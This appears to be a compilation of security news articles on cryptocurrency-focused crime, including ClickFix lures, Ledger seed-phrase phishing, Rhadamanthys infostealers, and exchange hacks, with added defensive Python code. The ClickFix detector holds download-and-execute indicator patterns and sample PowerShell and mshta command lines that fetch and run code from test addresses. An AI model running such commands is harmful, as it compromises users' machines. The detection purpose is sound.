
Crazy Evil Gang Strikes Crypto Sector with StealC, AMOS, and Angel Drainer Malware

A Russian-speaking cybercrime syndicate, Crazy Evil, has been tied to more than 10 active social media scams, employing diverse tactics to trick victims into installing malicious software such as StealC, Atomic macOS Stealer (AMOS), and Angel Drainer.

"Specializing in identity fraud, cryptocurrency theft, and information-stealing malware, Crazy Evil operates a sophisticated network of traffers — social engineering specialists tasked with redirecting legitimate traffic to malicious phishing sites," stated Recorded Future's Insikt Group in their analysis.

The group's varied malware arsenal indicates that its targets include both Windows and macOS users, posing a significant threat to the decentralized finance sector.

Crazy Evil, active since at least 2021, mainly operates as a traffer team, redirecting legitimate traffic to fraudulent landing pages controlled by other criminal entities. It is allegedly managed by a figure known as @AbrahamCrazyEvil on Telegram, where the group has over 4,800 subscribers (@CrazyEvilCorp).

Unlike typical scams that create counterfeit shopping websites for fraudulent transactions, Crazy Evil focuses on stealing digital assets, including NFTs, cryptocurrencies, payment card information, and online banking credentials. The group is believed to have generated over $5 million in illicit revenue, impacting thousands of devices worldwide.

The group's notoriety has grown following exit scams involving two other cybercrime outfits—Markopolo and CryptoLove—which were previously associated with a ClickFix campaign involving fake Google Meet pages in October 2024.

"Crazy Evil explicitly targets the cryptocurrency sector with custom spear-phishing lures," Recorded Future noted. "Crazy Evil traffers often spend days or even weeks scouting operations, identifying targets, and initiating engagements."

In addition to orchestrating attacks that deliver information stealers and wallet-draining malware, the group's leaders offer training materials and guidance for traffers, alongside an affiliate structure to delegate operations.

Crazy Evil is the second cybercrime group after Telekopye to be exposed in recent years, with its operations centered around Telegram. New recruits are guided by a Telegram bot controlled by the threat actor to various private channels, such as:

  • Payments: Announcing earnings for traffers
  • Logbar: Tracking information-stealer attacks and stolen data
  • Info: Offering regular updates on administrative and technical matters
  • Global Chat: A central space for communication, from work-related topics to casual discussions

The group operates through six sub-teams—AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND—each responsible for specific scams involving the installation of malicious tools via fake websites.

"As Crazy Evil continues to thrive, other cybercriminal groups are likely to mimic its tactics, urging security teams to stay alert to avoid large-scale breaches and loss of trust within the cryptocurrency, gaming, and software sectors," said Recorded Future.

This revelation follows the discovery of a traffic distribution system (TDS) named TAG-124, which overlaps with activity clusters linked to multiple threat groups, including Rhysida ransomware, Interlock ransomware, and SocGholish. This TDS is used in initial infection chains to distribute malware, such as the Remcos RAT and CleanUpLoader, which serves as a conduit for both Rhysida and Interlock ransomware.

"TAG-124 is composed of compromised WordPress sites, actor-controlled payload servers, and additional components," explained Recorded Future. "When specific criteria are met, these sites display fake Google Chrome update landing pages, leading to malware infections."

The use of TAG-124 further links Rhysida and Interlock ransomware strains, with newer variants employing the ClickFix technique, which instructs visitors to execute a command copied to their clipboard to trigger the malware infection.
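ClickFix leaves a recognisable endpoint footprint: the victim opens the Run dialog (hosted by explorer.exe), pastes the clipboard contents, and an interpreter such as powershell.exe or mshta.exe starts with a command line that fetches and executes a remote payload. The following Python is an added detection example written for this page, not code from Recorded Future or from the campaign; the event fields, the indicator regexes, the thresholds, and the sample events (constructed, using documentation IP ranges) are all assumptions to be tuned against your own process-creation telemetry (Sysmon Event ID 1, Windows 4688, or an EDR feed).

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Minimal process-creation record; the field names are this example's own.
@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

# The Run dialog (Win+R) that ClickFix lures tell the victim to open is hosted
# by explorer.exe, so explorer.exe is the parent we expect for a pasted command.
LAUNCHERS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Each (label, regex) pair is one independent reason to flag the command line.
INDICATORS = [
    ("remote fetch", re.compile(
        r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|certutil)\b")),
    ("in-memory exec", re.compile(r"(?i)\b(iex|invoke-expression)\b")),
    ("encoded command", re.compile(
        r"(?i)\s-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("url in command line", re.compile(r"(?i)https?://")),
    ("window hiding", re.compile(r"(?i)\s-w(indowstyle)?\s+hidden\b")),
]

def classify(event: ProcEvent) -> List[str]:
    """Return the list of indicator labels that match; empty means not flagged."""
    if _basename(event.parent_image) not in LAUNCHERS:
        return []
    if _basename(event.image) not in INTERPRETERS:
        return []
    return [label for label, rx in INDICATORS if rx.search(event.command_line)]

def detect_clickfix(events: List[ProcEvent]) -> List[Tuple[ProcEvent, List[str]]]:
    """Run classify() over a batch of events and keep the ones with reasons."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append((ev, reasons))
    return hits

# Constructed sample events (not real telemetry). Hosts are RFC 5737 test addresses.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -ep bypass -c "iwr http://198.51.100.7/u.txt | iex"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta https://203.0.113.9/verify.hta"),
    # Scheduled task, not a user-pasted command: parent is not explorer.exe
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    # Run-box usage with none of the indicators: stays unflagged
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -File "C:\Users\me\notes.ps1"'),
]

if __name__ == "__main__":
    for ev, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"FLAG {_basename(ev.image)}: {', '.join(reasons)} :: {ev.command_line}")
```

Pairing the parent/child constraint with content indicators keeps admin scripts and scheduled tasks out of the alert queue; a single "url in command line" hit from the Run box (the mshta case above) is still worth a look because ClickFix pages hand the victim exactly that kind of one-liner.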

Compromised WordPress sites, totaling over 10,000, have been used to distribute AMOS and SocGholish as part of client-side attacks.

"JavaScript loaded in the user's browser generates a fake page within an iframe," said researcher Himanshu Anand. "Attackers exploit outdated WordPress versions and plugins to avoid detection by websites lacking client-side monitoring tools."

Additionally, threat actors have leveraged the trust in platforms like GitHub to distribute malicious installers leading to the deployment of Lumma Stealer and other payloads, including SectopRAT, Vidar Stealer, and Cobalt Strike Beacon.

Trend Micro highlighted that this activity shares similarities with the tactics used by the threat actor Stargazer Goblin, known for utilizing GitHub repositories for payload distribution. However, the key difference is that the infection chain begins with compromised websites that redirect to malicious GitHub release links.

"The Lumma Stealer distribution method is evolving, with the attacker now using GitHub repositories to host malware," said security researchers Buddy Tancio, Fe Cureg, and Jovit Samaniego.

"The malware-as-a-service (MaaS) model makes it easier for cybercriminals to execute sophisticated cyberattacks, simplifying the spread of threats like Lumma Stealer."

In a comment to The Hacker News, Antonis Terefos, a reverse engineer at Check Point Research, noted that the Stargazer Goblin group has been observed "shifting from Atlantida Stealer to Lumma, and testing other stealers."

Sanctions Imposed on North Korean Cyber Activities Supporting Nuclear Ambitions


South Korea has announced sanctions against 15 North Korean nationals and the Chosun Geumjeong Economic Information Technology Exchange Corporation for orchestrating schemes that finance North Korea’s nuclear weapons and missile programs. These measures target a global network involved in IT job fraud, cryptocurrency theft, and cyberattacks. 

The sanctioned individuals are linked to the 313th General Bureau, a division of North Korea’s Ministry of Munitions Industry. This bureau oversees the production and development of weapons and ballistic missiles. According to South Korea’s Peninsula Policy Bureau, these operatives are dispatched to countries and regions such as China, Russia, Southeast Asia, and Africa. Using fake identities, they secure positions in international IT companies, generating revenue funneled back to the regime. 

Central to this operation is the Chosun Geumjeong Economic Information Technology Exchange Corporation. This organization plays a critical role by deploying IT professionals abroad and channeling significant financial resources to North Korea’s military projects. In recent years, North Korean operatives have increasingly infiltrated Western companies by posing as IT workers. This tactic not only generates revenue for the regime but also enables cyber espionage and theft. These workers have been found installing malware, stealing sensitive company data, and misappropriating funds. Some have even attempted to infiltrate secure software development environments. 

Despite the gravity of these actions, the stigma associated with hiring fraudulent workers has led many companies to keep such breaches private, leaving the true scope of the issue largely unknown. Additionally, South Korea accuses North Korea of being a major player in global cryptocurrency theft. A 2024 United Nations report found that North Korean hackers carried out 58 cyberattacks against cryptocurrency firms between 2017 and 2023, amassing approximately $3 billion in stolen funds. North Korean nationals have also reportedly violated international sanctions by earning income through employment in various industries, including construction and hospitality. 

These activities pose significant risks to the global cybersecurity landscape and international stability. South Korea asserts that the funds generated through these operations directly support North Korea’s nuclear and missile programs, emphasizing the need for a unified international response. By imposing these sanctions, South Korea aims to disrupt North Korea’s illicit financial networks and mitigate the broader risks posed by its cyber activities. 

This marks a crucial step in the global effort to counter the threats associated with Pyongyang’s nuclear ambitions and its exploitation of cyberspace for financial gain.

Ledger Phishing Scam Targets Cryptocurrency Wallets

A sophisticated phishing email campaign has emerged, targeting cryptocurrency users by impersonating Ledger, a prominent hardware wallet provider. These fraudulent emails claim that the recipient’s Ledger wallet seed phrase — also known as a recovery or mnemonic seed — has been compromised. In an attempt to secure their funds, users are directed to a so-called “secure verification tool” where they are asked to confirm their seed phrase. The phishing emails appear convincing, offering a “Verify my recovery phrase” button. Clicking this button redirects victims through an Amazon Web Services (AWS) website to a fake domain, “ledger-recovery[.]info.”

Once users enter their seed phrase on this page, the attackers capture the information, granting them full access to the victims’ cryptocurrency wallets. A recovery phrase, typically consisting of 12 or 24 random words, acts as the key to accessing a wallet’s funds. The importance of keeping this phrase private and offline cannot be overstated. By stealing these phrases, the attackers gain control of the wallets and can siphon all funds, leaving victims with no recourse.

To increase the scam’s credibility, the phishing site includes several deceptive features. For example, it accepts only valid seed phrase words from a predetermined list of 2,048 options. Regardless of the entered data, the site falsely informs users that their phrase is incorrect, encouraging them to re-enter their information multiple times and ensuring the attackers receive accurate details.
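Neither of those "credibility" features proves anything about the site: the 2,048-word list and the checksum rule are public (BIP-39), so any page can reject misspelled words and still have no idea whether your phrase is "correct" until it tries to spend from the derived keys. The Python below is an added example for this page, not code from Ledger or from the phishing kit, showing the encoding the scam is piggybacking on: entropy plus a SHA-256 checksum, eleven bits per word. It assumes a 2,048-entry wordlist supplied by the caller; the DEMO_WORDLIST is constructed so the block runs offline and is not the real English list.

```python
import hashlib
from typing import List, Optional

# 128..256 bits of entropy in 32-bit steps produce 12, 15, 18, 21 or 24 words.
ALLOWED_ENTROPY_BYTES = (16, 20, 24, 28, 32)
ALLOWED_WORD_COUNTS = (12, 15, 18, 21, 24)

def _check_wordlist(wordlist: List[str]) -> None:
    if len(wordlist) != 2048:
        raise ValueError("a BIP-39 wordlist has exactly 2048 entries")

def entropy_to_mnemonic(entropy: bytes, wordlist: List[str]) -> List[str]:
    """ENT bits of entropy + ENT/32 checksum bits (top bits of SHA-256), split 11 bits per word."""
    _check_wordlist(wordlist)
    if len(entropy) not in ALLOWED_ENTROPY_BYTES:
        raise ValueError("entropy must be 16, 20, 24, 28 or 32 bytes")
    ent_bits = len(entropy) * 8
    cs_bits = ent_bits // 32
    checksum = hashlib.sha256(entropy).digest()[0] >> (8 - cs_bits)
    bits = (int.from_bytes(entropy, "big") << cs_bits) | checksum
    total = ent_bits + cs_bits
    return [wordlist[(bits >> (total - 11 * (i + 1))) & 0x7FF] for i in range(total // 11)]

def mnemonic_to_entropy(words: List[str], wordlist: List[str]) -> Optional[bytes]:
    """Return the entropy if every word is in the list and the checksum matches, else None.

    This is all a 'verification tool' can do offline; it learns nothing about
    whether the phrase controls funds. A phishing page runs exactly this check
    to reject typos, then reports 'incorrect' regardless so the victim retypes.
    """
    _check_wordlist(wordlist)
    if len(words) not in ALLOWED_WORD_COUNTS:
        return None
    index = {w: i for i, w in enumerate(wordlist)}
    try:
        idxs = [index[w] for w in words]
    except KeyError:
        return None                      # a word outside the 2048-entry list
    total = 11 * len(words)
    cs_bits = total // 33                # 4 bits for 12 words, 8 bits for 24
    ent_bits = total - cs_bits
    bits = 0
    for i in idxs:
        bits = (bits << 11) | i
    entropy = (bits >> cs_bits).to_bytes(ent_bits // 8, "big")
    expected = hashlib.sha256(entropy).digest()[0] >> (8 - cs_bits)
    if (bits & ((1 << cs_bits) - 1)) != expected:
        return None                      # checksum mismatch
    return entropy

# Constructed stand-in for the real wordlist so the example runs offline.
DEMO_WORDLIST = [f"w{i:04d}" for i in range(2048)]

if __name__ == "__main__":
    phrase = entropy_to_mnemonic(bytes(range(32)), DEMO_WORDLIST)
    print(" ".join(phrase))
    print("round-trip ok:", mnemonic_to_entropy(phrase, DEMO_WORDLIST) == bytes(range(32)))
```

With the real English list, all-zero 128-bit entropy yields eleven times "abandon" followed by "about" (index 3), which is the first official BIP-39 test vector; the demo list reproduces the same indices. The practical takeaway is the inverse of the scam's pitch: a wallet vendor never needs your phrase to verify it, and a page that asks for it is the compromise, not the fix.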

The Evolving Nature of Phishing Scams

This phishing attempt highlights the evolving sophistication of such scams. In the past, phishing emails were often marred by poor grammar or clumsy wording, making them easier to spot. However, with advancements in generative artificial intelligence, scammers can now produce polished and professional-looking messages. In this instance, one of the few red flags was the use of the SendGrid email marketing platform and the redirection through an AWS website, which sharp-eyed recipients might notice.

While it remains unclear how many individuals fell victim to this scheme, any user who shared their seed phrase likely lost their funds permanently. This incident underscores the importance of exercising caution and maintaining strict security protocols when handling sensitive information like recovery phrases.

How to Protect Your Cryptocurrency Wallet

Cryptocurrency users are advised to verify communications directly through official sources and avoid clicking on links in unsolicited emails. Recovery phrases should never be shared online, as doing so compromises the entire wallet’s security. With scams becoming increasingly sophisticated, vigilance and education are crucial in safeguarding digital assets.

Global Companies Targeted by "CopyR(ight)hadamantys" Phishing Scam Using Advanced Infostealer Malware


Hundreds of organizations worldwide have recently fallen victim to a sophisticated spear-phishing campaign, where emails falsely claiming copyright infringement are used to deliver an advanced infostealer malware.

Since July, Check Point Research has tracked the distribution of these emails across regions like the Americas, Europe, and Southeast Asia. Each email originates from a unique domain, and hundreds of Check Point’s clients have been targeted, suggesting the campaign's scope may be even broader.

The emails are designed to provoke recipients into downloading Rhadamanthys, a powerful infostealer capable of extracting sensitive data, such as cryptocurrency wallet information. Check Point researchers refer to the campaign as "CopyR(ight)hadamantys" and note the use of automated tools to send emails from different addresses. This automation can lead to awkward results, such as emails written in incorrect languages, limiting the emails’ ability to impersonate recognizable brands effectively. Roughly 70% of impersonated companies belong to the tech or media and entertainment sectors, including Check Point itself.

The phishing emails claim that the recipient has violated copyright laws by posting unauthorized content online. According to Sergey Shykevich, threat intelligence manager at Check Point, these accusations often cause recipients to question if they mistakenly used copyrighted material, increasing the chance they'll download the malware.

Recipients are directed, via a link to Dropbox or Discord, to download a password-protected archive. This archive holds a decoy document, a legitimate program, and a malicious DLL (dynamic link library) that installs Rhadamanthys. Rhadamanthys stands out as one of the most sophisticated information-stealing tools sold on the dark web, priced around $1,000—significantly higher than other infostealers, which typically range from $100 to $200. Rhadamanthys is known for its modularity, obfuscation, and stealth, making detection much more challenging.

One notable feature of Rhadamanthys is its machine-learning-based OCR (optical character recognition) component. While limited in capability—it struggles with complex fonts and handwriting—this feature allows it to extract information from images and PDF files. The OCR module in the current campaign contains a dictionary of words tied to Bitcoin wallet security, suggesting a focus on cryptocurrency theft.

The CopyR(ight)hadamantys campaign aligns with financially motivated tactics, but Rhadamanthys has also been linked to state-sponsored actors, including Iran’s Void Manticore and the pro-Palestinian Handala group. Organizations are advised to enhance phishing defenses, though this campaign has an additional, unusual feature.

Once deployed, the malicious DLL creates a much larger file in the user’s Documents folder, disguised as a Firefox component. This larger version, though identical in function, uses an "overlay" of excess data, which serves two purposes: altering the file’s hash value, and potentially avoiding antivirus detection by exploiting a tendency of some programs to skip scanning large files.

According to Shykevich, organizations should monitor unusually large files downloaded via email, though legitimate files may also be large. He believes implementing effective download rules could help combat this tactic.
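Because the overlay changes the file hash without touching the code, hash-based blocking is exactly what the trick defeats; what survives is structure. A PE file's sections say where its real content ends, so anything after that point is overlay, and the hash of the bytes up to that point is the same for the padded and unpadded variants. The Python below is an added example for this page, not Check Point's tooling, and the build_fake_pe() helper produces a constructed, PE-shaped byte string for demonstration only (it is not a real or malicious binary); the 8 MiB threshold is an assumption to tune.

```python
import hashlib
import struct
from typing import Optional, Dict

def pe_end_of_sections(data: bytes) -> Optional[int]:
    """File offset just past the last section's raw data, or None if not PE-shaped."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    sec_table = e_lfanew + 24 + opt_size
    end = sec_table + 40 * num_sections          # at least the headers themselves
    for i in range(num_sections):
        off = sec_table + 40 * i
        if off + 40 > len(data):
            return None
        # IMAGE_SECTION_HEADER: SizeOfRawData at +16, PointerToRawData at +20
        size_raw, ptr_raw = struct.unpack_from("<II", data, off + 16)
        end = max(end, ptr_raw + size_raw)
    return end

def analyze_pe(data: bytes, min_overlay_bytes: int = 8 * 1024 * 1024) -> Optional[Dict]:
    """Measure the overlay and hash the file with and without it."""
    end = pe_end_of_sections(data)
    if end is None:
        return None
    overlay = max(0, len(data) - end)
    return {
        "size": len(data),
        "overlay_bytes": overlay,
        "overlay_ratio": overlay / len(data),
        "core_sha256": hashlib.sha256(data[:end]).hexdigest(),   # stable across padding
        "full_sha256": hashlib.sha256(data).hexdigest(),         # what the attacker changes
        "suspicious": overlay >= min_overlay_bytes,
    }

def build_fake_pe(payload: bytes, overlay: bytes = b"") -> bytes:
    """Constructed PE-shaped sample: DOS stub, COFF header, one section, optional overlay."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Signature + COFF header: Machine, NumberOfSections=1, ..., SizeOfOptionalHeader=0
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0)
    sec_off = e_lfanew + 24 + 40                  # raw data starts right after the section header
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", len(payload), 0x1000, len(payload), sec_off, 0, 0, 0, 0, 0x60000020)
    return dos + coff + section + payload + overlay

if __name__ == "__main__":
    plain = build_fake_pe(b"\x90" * 64)
    padded = build_fake_pe(b"\x90" * 64, b"\0" * (9 * 1024 * 1024))
    for name, sample in (("plain", plain), ("padded", padded)):
        r = analyze_pe(sample)
        print(name, r["size"], r["overlay_bytes"], r["suspicious"], r["core_sha256"][:16])
```

Run over the Documents folder (or over email attachments at the gateway), this turns Shykevich's "watch for unusually large files" into two concrete signals: an overlay that dwarfs the mapped sections, and a core hash that matches a known-bad sample even though the full-file hash does not. Legitimate installers do carry overlays, so the ratio and the core-hash match are what you alert on, not size alone.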

Crypto Wallet App on Google Play Steals $70,000 from Mobile Users


A fake crypto wallet draining app on Google Play has stolen USD 70,000 from users, making it the first case where mobile users were specifically targeted by such a scam. The app stayed active for several months before being discovered, according to a report from Check Point Research. 

The app pretended to be a real crypto wallet service, tricking more than 10,000 users into downloading it. What made the scam effective was its professional appearance, which included consistent branding and fake positive reviews. These tactics helped the app rank high in Google Play’s search results, making it seem trustworthy to people looking for a secure place to store their cryptocurrency. 

Once users installed the app, it was able to quietly drain funds from their wallets without being noticed right away. This case stands out because, up until now, most crypto wallet attacks have focused on desktop or browser-based platforms. This marks a shift, as cybercriminals are now targeting the growing number of people who use mobile platforms for crypto transactions. 

The app’s ability to avoid detection for such a long time shows how advanced cybercriminal tactics have become. It also highlights the need for greater caution among users when downloading apps, even from trusted platforms like Google Play. This scam underscores the importance of stronger security measures for mobile transactions, such as using verified wallets and enabling two-factor authentication. 

It also calls attention to the need for better app screening by platforms like Google Play to prevent such scams from reaching users in the first place. Though the amount stolen may seem small compared to other crypto thefts, this case is significant because it shows how cybercriminals are adapting to target mobile users as cryptocurrency becomes more popular.

WazirX Responds to Major Cyberattack with Trading Halt and Bounty Program


In the wake of a significant cyberattack, WazirX, one of India’s foremost cryptocurrency exchanges, has taken drastic measures to mitigate the damage. The exchange announced a halt in trading and introduced a bounty program aimed at recovering stolen assets. This attack has severely impacted their ability to maintain 1:1 collateral with assets, necessitating immediate action. 

In a series of posts on X, WazirX detailed their response to the breach. They have filed a police complaint and reported the incident to the Financial Intelligence Unit (FIU) and CERT-In. Co-founder Nischal Shetty emphasized the urgency of the situation, stating that the exchange is reaching out to over 500 other exchanges to block the identified addresses associated with the stolen funds. This broad collaboration is essential as the stolen assets move through various platforms. 

To further their recovery efforts, WazirX is launching a bounty program to incentivize individuals and entities to help freeze or recover the stolen assets. This initiative is part of a broader strategy to trace the stolen funds and enhance the security measures of the exchange. The team is also consulting with several expert groups specializing in cryptocurrency transaction tracking to provide continuous monitoring and support during the recovery process. The exchange expressed gratitude for the support from the broader Web3 ecosystem, underscoring the need for a collective effort to resolve the issue and maintain the integrity of the Web3 community. 

Shetty mentioned that the team is conducting a thorough analysis to understand the extent of the damage caused by the attack. This analysis is crucial for developing an effective recovery plan and ensuring that all possible measures are taken to protect customer funds. In addition to their internal efforts, WazirX is working closely with forensic experts and law enforcement agencies to identify and apprehend the perpetrators. This collaboration aims to ensure that those responsible are brought to justice and that as many stolen assets as possible are recovered. 

The cyberattack has resulted in a substantial loss of approximately $235 million, making it one of the largest hacks of a centralized exchange in recent history. Crypto investigator ZachXBT revealed that the main attacker’s wallet still holds over $104 million in funds, which have yet to be offloaded. 

This highlights the ongoing challenges and complexities of securing digital assets in the ever-evolving cryptocurrency landscape. WazirX’s proactive measures and the support from the broader community will be crucial in navigating this crisis and reinforcing the security frameworks essential for the future of cryptocurrency exchanges.

The Week of Crypto Platform Breaches: Prisma Finance Incident Highlights


The past week witnessed a series of bewildering events in the realm of cryptocurrency, marked by breaches on two prominent platforms that left the crypto community grappling with perplexing motives and unexpected outcomes. 

The first incident unfolded on Tuesday evening when the Munchables blockchain-based game fell victim to an attack, resulting in the theft of approximately $62 million worth of cryptocurrency. Initial speculation pointed towards North Korea-linked hackers, given the country's history of targeting cryptocurrency platforms for financial gain. However, the situation took an unexpected turn when the alleged perpetrator voluntarily returned the stolen funds without any ransom demands. 

In a surprising twist, Munchables shared that the individual behind the attack had relinquished access to the private keys containing the stolen funds, expressing gratitude for their cooperation. Despite this resolution, questions lingered about the circumstances surrounding the incident, including the attacker's identity and motives, prompting calls for enhanced security measures within the crypto community. Shortly thereafter, another breach occurred on Thursday evening, this time affecting Prisma Finance, a popular decentralized finance (DeFi) platform, which suffered a loss of approximately $11.6 million. 

However, the aftermath of this breach was marked by cryptic messages from the hacker, who claimed the attack was a "white hat" endeavour aimed at highlighting vulnerabilities in the platform's smart contracts. The hacker, whose identity remained undisclosed, reached out to Prisma Finance seeking to return the stolen funds and engaging in a discourse about smart contract auditing and developer responsibilities. 

Despite the hacker's apparent altruistic intentions, the incident underscored the importance of rigorous security measures and comprehensive audits in the DeFi space. Prisma Finance later released a post-mortem report detailing the flash loan attack that led to the breach, shedding light on the exploitation of vulnerabilities in the platform. The report emphasized ongoing efforts to investigate the incident and ensure the safety of users' funds, highlighting the collaborative nature of the crypto community in addressing security breaches. 

These breaches come against the backdrop of heightened scrutiny of cyberattacks on cryptocurrency platforms, with a recent United Nations report identifying North Korean hackers as key perpetrators. The report highlighted a staggering $3 billion in illicit gains attributed to North Korean cyberattacks over a six-year period, underscoring the persistent threat posed by state-sponsored hackers in the crypto space. 

As the investigation into these breaches continues, the crypto community remains vigilant, emphasizing the importance of robust security measures and proactive collaboration to safeguard against future threats. While the motives behind these breaches may remain shrouded in mystery, the incidents serve as a stark reminder of the ever-present risks associated with digital assets and the imperative of maintaining heightened security protocols in the evolving landscape of cryptocurrency.

Lazarus Group Hackers Resurface Utilizing Tornado Cash for Money Laundering


The Lazarus hacking group from North Korea is reported to have reverted to an old tactic to launder $23 million obtained during an attack in November. According to investigators at Elliptic, a blockchain research company, the funds, which were part of the $112.5 million stolen from the HTX cryptocurrency exchange, have been laundered through the Tornado Cash mixing service.

Elliptic highlighted the significance of this move, noting that Lazarus had previously switched to Sinbad.io after U.S. authorities sanctioned Tornado Cash in August 2022. However, Sinbad.io was later sanctioned in November. Elliptic observed that Lazarus Group appears to have resumed using Tornado Cash to obscure the trail of their transactions, with over $23 million laundered through approximately 60 transactions.

The researchers explained that this shift in behavior likely stems from the limited availability of large-scale mixers following law enforcement actions against services like Sinbad.io and Blender.io. Despite being sanctioned, Tornado Cash continues to operate because it runs as smart contracts rather than as a hosted service: unlike a centralized mixer, there is no operator or server to seize or shut down.

Elliptic has been monitoring the movement of the stolen $112.5 million since HTX attributed the incident to Lazarus. The funds remained dormant until March 13 when they were observed passing through Tornado Cash, corroborated by other blockchain security firms.

North Korean hackers utilize services such as Tornado Cash and Sinbad.io to conceal the origins of their ill-gotten gains and convert them into usable currency, aiding the regime in circumventing international sanctions related to its weapons programs, as per U.S. government claims.

According to the U.S. Treasury Department, North Korean hackers have utilized Sinbad and its precursor Blender.io to launder a portion of the $100 million stolen from Atomic Wallet customers in June, as well as substantial amounts from high-profile crypto thefts like those from Axie Infinity and Horizon Bridge.

Researchers estimate that North Korean groups pilfered around $1.7 billion worth of cryptocurrency in 2022 and approximately $1 billion in 2023. The Lazarus Group, operational for over a decade, has reportedly stolen over $2 billion worth of cryptocurrency to finance North Korea's governmental activities, including its weapons programs, as stated by U.S. officials. The group itself faced U.S. sanctions in 2019.

Hackers Steal Nearly $10 Million from Axie Infinity Co-founder’s Personal Accounts


A significant amount of cryptocurrency, valued at nearly $10 million, has been reported stolen from personal accounts belonging to Jeff "Jihoz" Zirlin, one of the co-founders associated with the video game Axie Infinity and its affiliated Ronin Network.

According to reports, Zirlin's wallets were compromised, resulting in the theft of 3,248 ether (ETH), worth approximately $9.7 million. Zirlin took to social media to confirm the incident, stating that two of his accounts had been breached. 

However, he emphasized that the attack solely targeted his personal accounts and did not affect the validation or operations of the Ronin chain or Axie Infinity, as reiterated by Aleksander Larsen, another co-founder of the Ronin Network.

The method through which the intruders gained access to Zirlin's wallets remains unclear. The Ronin Network serves as the underlying infrastructure for Axie Infinity, a game renowned for its play-to-earn model based on ethereum, particularly popular in Southeast Asia. 

Notably, the system had previously fallen victim to a $600 million cryptocurrency heist in March 2022, an attack attributed by U.S. prosecutors to the Lazarus Group, a cybercrime operation allegedly backed by North Korea.

Analysts tracking the recent theft traced the stolen funds to activity on Tornado Cash, a cryptocurrency mixer designed to obfuscate the origin of funds. It's worth noting that Lazarus had previously utilized this mixer to launder proceeds from the 2022 hack. The U.S. government, in response, had separately imposed sanctions on Tornado Cash.

Blockchain investigator PeckShield described the incident as a "wallet compromise," indicating a breach in security measures. Despite the breach, Zirlin assured stakeholders of the stringent security protocols in place for all activities related to the Ronin chain.